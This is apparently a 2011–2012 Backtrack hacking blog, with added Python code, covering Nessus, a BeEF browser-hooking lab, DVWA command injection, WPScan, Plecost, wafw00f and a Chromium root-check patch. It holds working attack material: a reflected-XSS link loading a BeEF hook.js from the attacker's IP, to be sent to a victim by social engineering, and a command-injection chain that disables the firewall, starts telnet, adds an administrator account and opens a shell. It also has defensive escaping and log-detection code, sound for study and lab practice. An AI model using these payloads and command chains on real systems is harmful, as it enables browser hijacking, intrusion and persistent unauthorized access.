Hacking

Hacking is an ART OF EXPLOITATION.

Nessus

One of the good network vulnerability scanners.

Acunetix

Web Application Scanner.

BeEF

Do you love BeEF? It's a browser-based exploitation framework.

Wikileaks

WikiLeaks is an international, online, non-profit organisation which publishes secret information, news leaks, and classified media from anonymous sources.

Showing posts with label backtrack.

Monday, October 1, 2012

Installing Nessus on Backtrack 5 R3

Hello Friends,

Today I am showing how to install Nessus on Backtrack 5 R3.

First go to the Nessus website and register to get an activation code.

The activation code will be sent to your e-mail address; keep it handy.

Open a new terminal in Backtrack 5 R3 and type the following command to download and install Nessus:

apt-get install nessus

After the download completes, register your installation with the activation code (the shell prompt is root@bt:~#; the command itself is the full path):

/opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxxx-xxxx-xxxx

This takes some time because the plugin feed is downloaded.

Now add a user to Nessus with this command:

/opt/nessus/sbin/nessus-adduser

It will ask for a username and password. After entering them, start the Nessus daemon with:

/etc/init.d/nessusd start

Once nessusd is running, open a browser and enter the following address in the URL bar:

https://localhost:8834/

Nessus serves its web interface over HTTPS on port 8834 by default. The certificate on a fresh install is self-signed, so expect a browser warning, and keep the web interface off untrusted networks.
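The same steps as a script with the checks the manual walk-through skips: the activation code is sanity-checked before it is handed to nessus-fetch, every command is run as an argv list (no shell), and the script waits until something actually answers on port 8834. This is an added example, not code from the post or from Tenable; it assumes the paths the post uses (/opt/nessus/bin/nessus-fetch, /opt/nessus/sbin/nessus-adduser, /etc/init.d/nessusd), the default port 8834, and that activation codes are five groups of four alphanumerics as the xxxx-xxxx-xxxx-xxxx-xxxx placeholder suggests.

```python
"""Scripted Nessus install for Backtrack 5 R3 with post-install verification.

Added example (not from the post or Tenable). Must be run as root for the
apt-get/nessus-fetch/nessus-adduser/nessusd steps to work.
"""
import re
import socket
import subprocess
import sys
import time

NESSUS_PORT = 8834                       # default nessusd port, as in the post
# Assumption: five dash-separated groups of four alphanumerics, any case.
ACTIVATION_RE = re.compile(r"^[A-Za-z0-9]{4}(-[A-Za-z0-9]{4}){4}$")


def activation_code_ok(code: str) -> bool:
    """Catch typos and pasted junk before nessus-fetch sees them.

    The code is passed as its own argv element (no shell), so this check is
    about early failure, not shell injection."""
    return bool(ACTIVATION_RE.match(code.strip()))


def tcp_port_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """True if something accepts a TCP connection on host:port."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def wait_for_port(host: str, port: int, timeout: float = 60.0) -> bool:
    """Poll until the port answers or the timeout expires."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        if tcp_port_open(host, port, 1.0):
            return True
        time.sleep(1.0)
    return False


def run(argv):
    """Run one step; a non-zero exit raises and stops the chain."""
    print("+ " + " ".join(argv))
    subprocess.run(argv, check=True)


def install_nessus(activation_code: str) -> bool:
    if not activation_code_ok(activation_code):
        raise ValueError("activation code does not look like xxxx-xxxx-xxxx-xxxx-xxxx")
    run(["apt-get", "install", "-y", "nessus"])
    run(["/opt/nessus/bin/nessus-fetch", "--register", activation_code.strip()])
    run(["/opt/nessus/sbin/nessus-adduser"])      # interactive: asks for user/password
    run(["/etc/init.d/nessusd", "start"])
    if not wait_for_port("127.0.0.1", NESSUS_PORT):
        print("nessusd did not come up on port %d" % NESSUS_PORT, file=sys.stderr)
        return False
    print("Nessus is up: https://localhost:%d/" % NESSUS_PORT)
    return True


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: install_nessus.py <activation-code>")
    sys.exit(0 if install_nessus(sys.argv[1]) else 1)
```

Run it as root with the activation code as the only argument; nessus-adduser still prompts interactively, exactly as in the manual steps.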

after installing you just have to run


Thank you.




Tuesday, September 4, 2012

BeEF Lab


Hello friends

We saw how to start and test BeEF in the previous post. In this post we will see how to use a reflected XSS vulnerability to hook a victim's browser with the BeEF framework.

Lab Setting:


1. XP virtual machine (victim)
2. Backtrack VM (attacker)

Attacker:


1. Start BeEF on the Backtrack machine.

The terminal will print the UI URL and the hook URL.



2. Open a browser (any browser, but Firefox is preferable).

3. Copy the UI URL from the terminal and paste it into the browser's address bar, e.g. http://192.168.0.103:3000/ui/panel

4. You will get the BeEF login screen.

5. Enter the default username and password, beef/beef (change them in BeEF's config.yaml before using it anywhere outside the lab).



6. Take any site that is vulnerable to XSS, for example demo.testfire.net (a deliberately vulnerable demo site).

7. Check for reflected cross-site scripting with a simple probe: <script>alert(123);</script>



8. Paste that script into the search box of demo.testfire.net.



9. See whether you get the pop-up box or not.



10. Look at the URL in the address bar: http://demo.testfire.net/search.aspx?txtSearch=<script>alert(123);</script>. The search term is reflected into the page without escaping, which is why the script runs.

11. Now replace the alert with the BeEF hook, <script src=http://192.168.0.103:3000/hook.js></script>, so the URL becomes

http://demo.testfire.net/search.aspx?txtSearch=<script src=http://192.168.0.103:3000/hook.js></script>

The hook address must be reachable from the victim's browser, so 192.168.0.103 has to be your attacker machine's IP on a network the victim can route to.



12. Use some social engineering to send the link to the victim by mail or chat.

Victim:


1. The victim opens the link the attacker sent. Nothing visibly changes and the page looks as usual, but hook.js is now running in the victim's browser and polling the BeEF server.

Attacker:


Whenever the victim opens that link, check the BeEF user interface:

BeEF lists the victim's browser as a new "zombie" (hooked browser).

Click on the zombie that was created.



Go to the Commands tab --> Misc --> Raw JavaScript --> Execute



and watch the result on the victim machine, i.e. XP.



You can now run whatever JavaScript you want inside the victim's browser. Note that BeEF commands execute in the browser, in the origin of the hooked page, not as OS commands on the victim machine; getting from a hooked browser to the operating system needs a browser or plugin exploit, which is where Metasploit comes in.
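Why step 10's reflection lets hook.js in, shown as an added example that is not code from the post, from BeEF or from demo.testfire.net: a stand-in for search.aspx that reflects txtSearch unescaped, the same handler with HTML escaping, and the link-building step from item 11. The only things taken from the post are the parameter name txtSearch and the hook URL; I quote the src attribute, which the post leaves bare.

```python
"""Reflected XSS: the vulnerable search page beside its escaped version.

Added example, not from the post, BeEF or demo.testfire.net. render_search_*
are stand-ins for search.aspx; HOOK_URL is the attacker's BeEF hook from the post.
"""
import html
from urllib.parse import urlencode, urlparse, parse_qs

HOOK_URL = "http://192.168.0.103:3000/hook.js"   # attacker's BeEF hook (from the post)


def render_search_vulnerable(query: str) -> str:
    """The bug: the search term goes back into the HTML exactly as received."""
    return "<h2>Search results for: %s</h2>\n<p>No results found.</p>" % query


def render_search_fixed(query: str) -> str:
    """Same page with the term HTML-escaped, so <script ...> becomes inert text."""
    return "<h2>Search results for: %s</h2>\n<p>No results found.</p>" % html.escape(query, quote=True)


def build_hook_link(search_url: str, hook_url: str = HOOK_URL) -> str:
    """Step 11 of the post: put the hook tag into the txtSearch parameter.

    urlencode percent-encodes < > " / so the link survives mail and chat
    clients unchanged; the server decodes it again before reflecting it."""
    payload = '<script src="%s"></script>' % hook_url
    return search_url + "?" + urlencode({"txtSearch": payload})


def extract_search_term(url: str) -> str:
    """What the server sees after decoding the query string."""
    qs = parse_qs(urlparse(url).query)
    return qs.get("txtSearch", [""])[0]


def page_loads_hook(rendered_html: str, hook_url: str = HOOK_URL) -> bool:
    """Is there a live <script src=hook> tag in the rendered page?"""
    return ('<script src="%s"' % hook_url) in rendered_html


if __name__ == "__main__":
    link = build_hook_link("http://demo.testfire.net/search.aspx")
    term = extract_search_term(link)
    print("link sent to victim:", link)
    print("vulnerable page loads hook:", page_loads_hook(render_search_vulnerable(term)))
    print("fixed page loads hook:     ", page_loads_hook(render_search_fixed(term)))
```

The fix is output encoding at the point where untrusted data meets HTML; the hook tag still arrives, but the browser renders it as text and never fetches hook.js.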

In the next post I will show how to integrate Metasploit with the BeEF framework.

Thank you.

Saturday, May 19, 2012

Command Execution Vulnerability Exploitation


Today I will show how to exploit a command execution vulnerability in a website.

We will look at it in DVWA.

What is Command Execution?

OS command injection is a technique used via a web interface to execute OS commands on the web server.

The application takes user-supplied input and builds an operating system command from it. Any web interface that does not properly validate that input is subject to this exploit: the user appends shell operators and commands of their own, and the server runs them. With the ability to execute OS commands, the attacker can read files, upload malicious programs or even obtain passwords.

*** In the previous article I described how to access DVWA, installed on the XP machine, from Backtrack.

Practical:

1. Take the XP machine and the Backtrack machine.

2. Enter the IP of the XP machine followed by the DVWA path:

http://192.168.25.54/dvwa

DVWA will open; go to Command Execution.

3. The DVWA page asks for an IP to ping,

so enter 127.0.0.1 (the loopback address, so the XP machine pings itself).

It pings, so the feature works.

4. Now try to execute the dir command on its own...

boom.......

You get an error. What is the problem?

The page only runs ping: whatever you type is appended to a ping command, so dir by itself is just an invalid hostname.

How do we bypass this?

We can bypass it with the cmd.exe command separators: && runs the second command if ping succeeds, | pipes ping's output into the second command and runs it regardless, and a single & runs both unconditionally.

5. Now let's try these:

127.0.0.1 && dir  (or)

127.0.0.1 | dir   (or)

 | dir

meaning just the pipe and a command; ping fails for lack of a target but dir still runs.


OK, it executed. Now find the IP configuration of the remote system:

127.0.0.1 | ipconfig

(the target is Windows, so the command is ipconfig; ifconfig is the Linux equivalent and would fail here.)

If you want to list the files in the system32 directory:

127.0.0.1 && cd ../../../../../windows/system32 & dir


Now you can read whatever files you need from the system, with the privileges of the web server process.

What else can we do with Command Execution?

Normally I execute commands like this:

| dir

but after that I want a shell on the remote computer. There are different ways; I am showing one.

1. First I disabled the firewall by executing Windows commands.

To disable the Windows XP firewall:

    netsh firewall set opmode disable

In the command execution box type "| netsh firewall set opmode disable" (without quotes).
   
To enable the Windows XP firewall again:

    netsh firewall set opmode enable
   
2. After that I want to start a service that is helpful to me, so I started the Telnet service with the following commands.

To start the Telnet service from the command prompt (the space after start= is required by sc's syntax):

    sc config tlntsvr start= auto (Hit Enter)

    net start telnet

In the command execution box type "| sc config tlntsvr start= auto" (without quotes), then

    | net start telnet



3. Now I want to access the remote PC with Telnet, but it will ask for a login and password,

so I added a user from the command prompt.

To add a new user from the command prompt:

    net user /add user1 Ab12345

In the command execution box type "| net user /add user1 Ab12345" (without quotes).



4. Now I have a user but not the privileges to log in over Telnet, so I added this user to the Administrators group for admin privileges:

    net localgroup administrators user1 /add

In the command execution box type "| net localgroup administrators user1 /add" (without quotes).

5. I started a terminal in Backtrack and connected with telnet:

    telnet 192.168.x.x
   
    login:user1
    password:Ab12345





Boooooooooooooooom...............
   
Got the shell of the remote computer:

    c:\>

Every command in this chain runs as whatever account Apache/XAMPP runs under; netsh, sc config and net localgroup only succeed because that account is an administrator (or SYSTEM), which is the second misconfiguration the lab depends on.
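The same chain seen from the defender's side, as an added example that is not from the post or DVWA: a scanner over Apache access-log lines that decodes the ping parameter and flags requests carrying a command separator followed by the post-exploitation commands used above. The log lines are constructed, in Apache combined format, with the pinged address in a GET parameter named ip so it shows up in access.log (DVWA's own form posts it; for POST bodies feed the same parser from a proxy or ModSecurity audit log instead).

```python
"""Flag OS command injection attempts (netsh, sc config, net user, net localgroup)
in web server access logs.

Added example, not from the post or DVWA. SAMPLE_LOG is constructed.
"""
import re
from urllib.parse import urlparse, parse_qs

# Constructed Apache combined-format lines: one legitimate ping, then the
# firewall / user / group steps from the write-up, then an unrelated request.
SAMPLE_LOG = """\
192.168.25.10 - - [19/May/2012:14:02:11 +0530] "GET /dvwa/vulnerabilities/exec/?ip=127.0.0.1&submit=submit HTTP/1.1" 200 4120
192.168.25.10 - - [19/May/2012:14:03:40 +0530] "GET /dvwa/vulnerabilities/exec/?ip=127.0.0.1+%7C+netsh+firewall+set+opmode+disable&submit=submit HTTP/1.1" 200 3980
192.168.25.10 - - [19/May/2012:14:04:05 +0530] "GET /dvwa/vulnerabilities/exec/?ip=%7C+net+user+%2Fadd+user1+Ab12345&submit=submit HTTP/1.1" 200 3977
192.168.25.10 - - [19/May/2012:14:04:30 +0530] "GET /dvwa/vulnerabilities/exec/?ip=%7C+net+localgroup+administrators+user1+%2Fadd&submit=submit HTTP/1.1" 200 3990
192.168.25.77 - - [19/May/2012:14:05:02 +0530] "GET /dvwa/index.php HTTP/1.1" 200 2210
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# cmd.exe / sh separators; && and || are listed before the single forms so the
# regex reports the operator actually used.
SHELL_OPERATORS = re.compile(r"(\|\||&&|;|\||&|`|\$\()")
# The post-exploitation commands from the write-up plus common recon commands.
SUSPICIOUS_CMDS = re.compile(
    r"\b(netsh|sc\s+config|net\s+(?:user|localgroup|start)|dir|ipconfig|ifconfig|whoami|type)\b",
    re.I,
)


def inspect_param(decoded_value: str):
    """Return (operator, command) when the decoded parameter carries a shell
    operator, else None. The command is the first known one after the operator,
    or the first 40 characters following it when none is recognised."""
    op = SHELL_OPERATORS.search(decoded_value)
    if not op:
        return None
    tail = decoded_value[op.end():]
    cmd = SUSPICIOUS_CMDS.search(tail)
    return (op.group(1), cmd.group(0) if cmd else tail.strip()[:40])


def scan_access_log(text: str, param: str = "ip"):
    """One alert dict per request whose `param` looks injected."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qs percent-decodes and turns + into space, once; do not decode again.
        qs = parse_qs(urlparse(m["target"]).query, keep_blank_values=True)
        for value in qs.get(param, []):
            hit = inspect_param(value)
            if hit:
                alerts.append({"src": m["src"], "ts": m["ts"],
                               "operator": hit[0], "command": hit[1]})
    return alerts


if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print("%(ts)s %(src)s operator=%(operator)s command=%(command)s" % alert)
```

Three alerts from one source address within a minute, walking from firewall to user creation to group membership, is the pattern to escalate on; a single flagged request may be a scanner, the sequence is a hands-on intrusion.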



Access DVWA from Backtrack

Hi,

Today I will show you how to access DVWA (Damn Vulnerable Web Application), installed on the XP machine, from Backtrack.

1. First we need the XP machine and the Backtrack machine on the same network, meaning

if the XP machine's IP is 192.168.0.22

then Backtrack should also be in the same network, e.g. 192.168.0.56.

2. Install XAMPP on the XP machine and start the Apache and MySQL services.




3. Download DVWA from http://sourceforge.net/projects/dvwa/ and unpack it into C:\xampp\htdocs\.

4. Now go to the dvwa folder and open the .htaccess file with Notepad.

5. Move to the end, put a hash (#) before the "Deny from all" line

and write "Allow from all" on the next line. This opens DVWA, which is deliberately insecure, to everything that can reach the XP machine, so outside an isolated lab network allow only the Backtrack machine's address instead of all.



6. Now go to Backtrack and in the browser type the IP of the XP machine:

http://192.168.0.22/dvwa

7. Now you can access DVWA from the remote machine.



Thank You.


Thursday, April 26, 2012

Installing Google Chrome in Backtrack 5








Friends,

Many people ask how to install the Google Chrome browser on Backtrack 5. Today we will see how to install Chromium, the open-source build it is based on, and make it run as root.



Let us see the steps.

1. As root, type:

apt-get install chromium-browser



2. Change to the chromium-browser directory:

 cd /usr/lib/chromium-browser




3. Open the binary in the hex editor:

 hexedit chromium-browser




4. You will see the hex dump.


Chromium refuses to start as root, and Backtrack runs everything as root. It makes that decision by calling geteuid(); here you replace the imported symbol name geteuid with getppid, which is the same length (so the binary's string table stays intact) and returns the parent's PID, never 0 for a normally started process, so the root check passes.


Press TAB to move to the ASCII column, search (CTRL+S) for geteuid, overtype it with getppid and press CTRL+X;

it will ask whether to save: press 'Y' and close the terminal,

then go to Applications --> Internet --> Chromium Browser

and check whether the browser starts properly. Keep in mind that the browser process now runs with full root privileges, which is exactly what the check was there to prevent. Enjoy Backtrack.
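The hexedit step done programmatically, as an added example that is not from the post or the Chromium project: it works on a copy, only rewrites the NUL-terminated symbol name (so names like geteuid32 are left alone), counts what it changed, and refuses a replacement of a different length, which would shift the ELF string table and corrupt every symbol after it. The default names are the ones the post uses; the blob in the test is constructed.

```python
"""Same-length symbol-name patch of a binary (geteuid -> getppid), with checks.

Added example, not from the post or Chromium. Patches a copy, never in place.
"""
import sys
from pathlib import Path


def patch_symbol(data: bytes, old: bytes = b"geteuid", new: bytes = b"getppid"):
    """Return (patched_bytes, count).

    Only whole string-table entries are touched: entries are NUL separated,
    so the needle is NUL + name + NUL. A longer or shorter replacement would
    move every following entry, hence the length check."""
    if len(old) != len(new):
        raise ValueError("replacement must be the same length as the original")
    needle = b"\x00" + old + b"\x00"
    replacement = b"\x00" + new + b"\x00"
    count = data.count(needle)
    return data.replace(needle, replacement), count


def patch_file(src: Path, dst: Path, old: bytes = b"geteuid", new: bytes = b"getppid") -> int:
    """Write a patched copy of src to dst (same mode bits) and return the
    number of entries changed; refuse to write a copy that changed nothing."""
    data = src.read_bytes()
    patched, count = patch_symbol(data, old, new)
    if count == 0:
        raise RuntimeError("symbol %r not found in %s" % (old, src))
    dst.write_bytes(patched)
    dst.chmod(src.stat().st_mode)
    return count


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: patch_symbol.py /usr/lib/chromium-browser/chromium-browser <output-copy>")
    n = patch_file(Path(sys.argv[1]), Path(sys.argv[2]))
    print("patched %d string-table entr%s" % (n, "y" if n == 1 else "ies"))
```

Check the count it reports: exactly one changed entry is what you expect for a single imported symbol, and anything else means the needle matched something you did not intend.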

Saturday, October 29, 2011

WPScan - Wordpress Security Scanner







WPScan is a black-box WordPress vulnerability scanner.

WPScan is written in Ruby.

The features of WPScan are:

  Username enumeration
  Weak password brute forcing
  Plugin enumeration and known plugin vulnerabilities
  Version enumeration
  Vulnerability enumeration
  etc.

It can be downloaded for free from http://code.google.com/p/wpscan/

OR

It is available in Backtrack 5 under /pentest/web/wpscan/

Syntax:
         ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50

With --wordlist it brute forces the enumerated user accounts; that is noisy, may trigger login lockout plugins, and should only be run with the site owner's permission.


Plecost - Wordpress fingerprint tool




A WordPress fingerprinting tool, open source and shipped with Backtrack 5.

Plecost retrieves information from the website under analysis and can also search through the results Google has indexed.

It bases its analysis on information in the development files that WordPress and its plugins ship with. The plugin list is generated from the "Most popular" list on wordpress.org and linked with the related entries at cve.mitre.org.

Plecost is available at http://code.google.com/p/plecost

Plecost fingerprints the installed plugins and reports the corresponding CVE entries as well.

syntax:

     ./plecost-0.2.2-9-beta.py -i wp_plugin_list.txt http://www.example.com -G
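What WPScan's username and version enumeration and Plecost's plugin fingerprinting boil down to, as one added example that is neither tool's code: WordPress redirects /?author=N to /author/<login>/, advertises its version in the generator meta tag, and each plugin ships a readme.txt with a "Stable tag:" line. The HTTP layer is a dictionary of constructed responses so the example runs offline; the plugin list plays the role of Plecost's wp_plugin_list.txt.

```python
"""WordPress fingerprinting: users via ?author=N, core version via the generator
tag, plugin versions via readme.txt.

Added example; not WPScan's or Plecost's code. FAKE_SITE is constructed; swap
`fetch` for a real HTTP client to use it against a live site.
"""
import re
from typing import Callable, Dict, List, Optional, Tuple

Response = Tuple[int, Dict[str, str], str]   # status, headers, body

# Constructed responses standing in for a WordPress 3.4.2 site with two plugins.
FAKE_SITE: Dict[str, Response] = {
    "http://www.example.com/": (200, {}, '<meta name="generator" content="WordPress 3.4.2" />'),
    "http://www.example.com/?author=1": (301, {"Location": "http://www.example.com/author/admin/"}, ""),
    "http://www.example.com/?author=2": (301, {"Location": "http://www.example.com/author/editor-jane/"}, ""),
    "http://www.example.com/?author=3": (404, {}, "Not found"),
    "http://www.example.com/wp-content/plugins/akismet/readme.txt": (200, {}, "=== Akismet ===\nStable tag: 2.5.6\n"),
    "http://www.example.com/wp-content/plugins/contact-form-7/readme.txt": (200, {}, "=== Contact Form 7 ===\nStable tag: 3.2\n"),
}


def fetch(url: str) -> Response:
    """Offline stand-in for an HTTP GET that does not follow redirects."""
    return FAKE_SITE.get(url, (404, {}, ""))


AUTHOR_RE = re.compile(r"/author/([^/]+)/?$")
GENERATOR_RE = re.compile(r'<meta name="generator" content="WordPress ([\d.]+)"')
STABLE_TAG_RE = re.compile(r"^Stable tag:\s*([\w.\-]+)", re.M)


def enumerate_users(base: str, fetch: Callable[[str], Response],
                    max_id: int = 10, stop_after_misses: int = 2) -> List[Tuple[int, str]]:
    """Walk author IDs; the redirect target leaks the login name. Stop after a
    run of misses so a site with three users does not get ten requests."""
    users, misses = [], 0
    for author_id in range(1, max_id + 1):
        status, headers, _ = fetch("%s/?author=%d" % (base.rstrip("/"), author_id))
        m = AUTHOR_RE.search(headers.get("Location", "")) if status in (301, 302) else None
        if m:
            users.append((author_id, m.group(1)))
            misses = 0
        else:
            misses += 1
            if misses >= stop_after_misses:
                break
    return users


def wordpress_version(base: str, fetch: Callable[[str], Response]) -> Optional[str]:
    _, _, body = fetch(base.rstrip("/") + "/")
    m = GENERATOR_RE.search(body)
    return m.group(1) if m else None


def plugin_versions(base: str, fetch: Callable[[str], Response], plugin_list: List[str]) -> Dict[str, str]:
    """For each candidate plugin, a 200 on its readme.txt proves it is installed
    and the Stable tag gives the version to look up against CVE data."""
    found = {}
    for name in plugin_list:
        status, _, body = fetch("%s/wp-content/plugins/%s/readme.txt" % (base.rstrip("/"), name))
        if status != 200:
            continue
        m = STABLE_TAG_RE.search(body)
        found[name] = m.group(1) if m else "unknown"
    return found


if __name__ == "__main__":
    site = "http://www.example.com"
    print("WordPress version:", wordpress_version(site, fetch))
    print("users:", enumerate_users(site, fetch))
    print("plugins:", plugin_versions(site, fetch, ["akismet", "contact-form-7", "wp-super-cache"]))
```

Every probe here is an ordinary GET, which is why these tools need no credentials and why the same checks make a cheap self-audit of your own site.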

      



Friday, October 28, 2011

WafW00f - A Web Application Audit Tool


WAFW00F - Web Application Firewall Detection Tool

WafW00f is written in Python and is freely available on the net.

The tool was developed by Sandro Gauci and Wendel G. Henrique.

They point out that Web Application Firewalls (WAFs):
  • can be detected, because they leave several signs
  • can be bypassed by changing the attack in order to avoid rules
To help detect and bypass WAFs, they released wafw00f.

WAFW00F lets you identify and fingerprint the WAF product protecting a website.

Download (Subversion checkout):

svn checkout http://waffit.googlecode.com/svn/trunk/ waffit-read-only

or you can find it in Backtrack 5 R1 under /pentest/web/waffit/


example 1: /pentest/web/waffit# ./wafw00f.py http://www.example.com

output:

Checking http://www.example.com
Generic Detection results:
No WAF detected by the generic detection

example 2: /pentest/web/waffit# ./wafw00f.py http://www.example2.com

output:

Checking http://www.example2.com
The site http://www.example2.com is behind a Citrix NetScaler

Read "No WAF detected" as "no known signature and no visible difference between a normal and a hostile request", not as proof that there is no WAF.
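How the two detection modes in the output above work, as an added example that is not wafw00f's code (its real signature set is much larger and lives in the tool's plugins): product signatures matched against response headers, and the generic fallback that compares how the site answers a harmless request and one carrying an obvious attack. The two signatures (NetScaler's NSC_ / citrix_ns_id cookies, Cloudflare's cf-ray header and __cfduid cookie) and the responses are assumptions used for illustration.

```python
"""WAF detection the wafw00f way: signature match first, generic diff second.

Added example, not wafw00f's code. Signatures and FAKE_SITES are constructed
for illustration; header names are lower-cased as an HTTP client would.
"""
import re
from typing import Dict, Optional, Tuple

Response = Tuple[int, Dict[str, str], str]   # status, lower-cased headers, body

# Query string sent on the "attack" request: an obvious XSS and SQLi probe.
ATTACK_QUERY = "?q=<script>alert(1)</script>' OR 1=1--"

# Constructed exchanges: each site's answer to a normal and to an attack request.
FAKE_SITES: Dict[str, Dict[str, Response]] = {
    "http://www.example.com": {
        "normal": (200, {"server": "Apache/2.2.22", "set-cookie": "PHPSESSID=abc123; path=/"}, "<html>welcome</html>"),
        "attack": (200, {"server": "Apache/2.2.22", "set-cookie": "PHPSESSID=abc123; path=/"}, "<html>welcome</html>"),
    },
    "http://www.example2.com": {
        "normal": (200, {"server": "Microsoft-IIS/6.0", "set-cookie": "NSC_pfsl=ffffffff09a0f3c245525d5f4f58455e445a4a423660; path=/"}, "<html>shop</html>"),
        "attack": (403, {"set-cookie": "NSC_pfsl=ffffffff09a0f3c245525d5f4f58455e445a4a423660; path=/"}, "Access denied"),
    },
    "http://www.example3.com": {
        "normal": (200, {"server": "nginx"}, "<html>ok</html>"),
        "attack": (406, {"server": "nginx"}, "Not Acceptable"),
    },
}

# (product, header name, pattern on the header value). Assumed signatures.
SIGNATURES = [
    ("Citrix NetScaler", "set-cookie", re.compile(r"(^|;\s*)(NSC_[A-Za-z0-9_\-]*|citrix_ns_id|ns_af)=")),
    ("Cloudflare", "cf-ray", re.compile(r".+")),
    ("Cloudflare", "set-cookie", re.compile(r"(^|;\s*)__cfduid=")),
]
BLOCK_STATUSES = {403, 406, 419, 429, 501, 503}


def fingerprint(resp: Response) -> Optional[str]:
    """Name the product if any signature matches the response headers."""
    _, headers, _ = resp
    for product, header, pattern in SIGNATURES:
        value = headers.get(header)
        if value is not None and pattern.search(value):
            return product
    return None


def generic_detect(normal: Response, attack: Response) -> bool:
    """Fallback: something in front of the site treats a hostile request
    differently (blocking status, server error, or a much shorter body)."""
    n_status, _, n_body = normal
    a_status, _, a_body = attack
    if n_status == a_status and n_status in (200, 301, 302):
        return False
    return a_status in BLOCK_STATUSES or a_status >= 500 or len(a_body) < len(n_body) // 2


def detect(site: str, exchanges: Dict[str, Response]) -> str:
    """Report in the same wording wafw00f prints."""
    product = fingerprint(exchanges["normal"]) or fingerprint(exchanges["attack"])
    if product:
        return "The site %s is behind a %s" % (site, product)
    if generic_detect(exchanges["normal"], exchanges["attack"]):
        return "Generic detection results: the site %s seems to be behind a WAF" % site
    return "No WAF detected by the generic detection"


if __name__ == "__main__":
    for site, exchanges in FAKE_SITES.items():
        print("Checking", site)
        print(detect(site, exchanges))
```

The generic branch is what catches a WAF that strips its own headers: the product stays unknown, but the different treatment of ATTACK_QUERY still gives it away, and it is also the branch that says nothing when a WAF is tuned to log rather than block.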